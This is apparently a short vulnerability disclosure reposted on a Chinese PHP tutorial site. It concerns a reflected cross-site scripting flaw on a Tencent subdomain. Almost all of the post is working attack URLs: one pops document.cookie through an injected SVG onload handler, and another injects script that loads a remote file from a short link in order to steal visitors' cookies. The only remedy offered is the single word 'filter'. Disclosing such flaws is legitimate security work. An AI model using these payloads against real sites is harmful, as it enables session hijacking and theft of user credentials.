来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 腾讯分站反射型跨站可获取小甜饼1:访问http: sync coral qq com t 1000269489?source=1callback=1014xxx%3Csvg onload=alert%28document cookie%29%3E_=13761857374252:构造获取cookie的链接:http: sync...
|
腾讯分站反射型跨站可获取小甜饼
1:访问http://sync.coral.qq.com/t/1000269489?source=1&callback=1014xxx%3Csvg/onload=alert%28document.cookie%29%3E&_=1376185737425
 2:构造获取cookie的链接:
http://sync.coral.qq.com/t/1000269489?source=1&callback=1014xxx%3Csvg/onload=%22var/**/s=document.createElement%28%27script%27%29;s.src=%27http://t.cn/zl70EH3%27;document.body.appendChild%28s%29;%22%3E&_=1376185737425
可获取别人cookie:
 修复方案:
过滤!!
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
